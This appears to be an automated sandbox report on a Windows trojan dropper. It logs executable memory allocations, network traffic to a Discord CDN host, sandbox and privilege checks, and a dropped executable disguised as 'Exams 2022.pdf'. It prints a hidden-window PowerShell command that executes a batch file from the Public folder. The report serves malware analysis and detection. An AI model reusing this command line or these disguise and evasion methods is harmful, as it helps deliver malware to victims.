NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06af6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06afa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06b0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06b0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 3052 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06b0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0284a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02852000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02853000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02854000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 10, 2023, 11:10 a.m.	process_identifier: 2104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ygz592.bat'"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW March 10, 2023, 11:10 a.m.	thread_identifier: 1780 thread_handle: 0x000004fc process_identifier: 2104 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ygz592.bat'" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x000004f8	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 10, 2023, 11:10 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (4 events)

Data sent	uqd ¥æ=ä}£AÓ&òRon·.5Ê0nsa«[/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	uqd ¥X}}×ãä@Ð42AùÝûd ø~õ$ç/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	uqd ¥xj¹X*àl·ùáßÒ^ñÃäZywAý ¯N¾/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	uqd ¥0AÕý0×Qf²wyE (ô`Õ/5 ÀÀÀ À 280ÿcdn.discordapp.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 10, 2023, 11:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\Exams 2022.pdf

File has been identified by 11 AntiVirus engines on VirusTotal as malicious (11 events)

FireEye	Trojan.Agent.GBLD
ALYac	Trojan.Agent.GBLD
Arcabit	Trojan.Agent.GBLD
Avast	Script:SNH-gen [Drp]
BitDefender	Trojan.Agent.GBLD
MicroWorld-eScan	Trojan.Agent.GBLD
Emsisoft	Trojan.Agent.GBLD (B)
VIPRE	Trojan.Agent.GBLD
GData	Trojan.Agent.GBLD
MAX	malware (ai score=80)
AVG	Script:SNH-gen [Drp]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send March 10, 2023, 11:10 a.m.	buffer: uqd ¥æ=ä}£AÓ&òRon·.5Ê0nsa«[/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1468 sent: 122	1	122
send March 10, 2023, 11:10 a.m.	buffer: uqd ¥X}}×ãä@Ð42AùÝûd ø~õ$ç/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1468 sent: 122	1	122
send March 10, 2023, 11:10 a.m.	buffer: uqd ¥xj¹X*àl·ùáßÒ^ñÃäZywAý ¯N¾/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1612 sent: 122	1	122
send March 10, 2023, 11:10 a.m.	buffer: uqd ¥0AÕý0×Qf²wyE (ô`Õ/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1612 sent: 122	1	122

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ygz592.bat'"
parent_process	powershell.exe	martian_process	C:\Users\Public\i8h.bat
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\Exams 2022.pdf

Creates a suspicious Powershell process (1 event)

option

-win hidden

value

Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

uucqwn.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All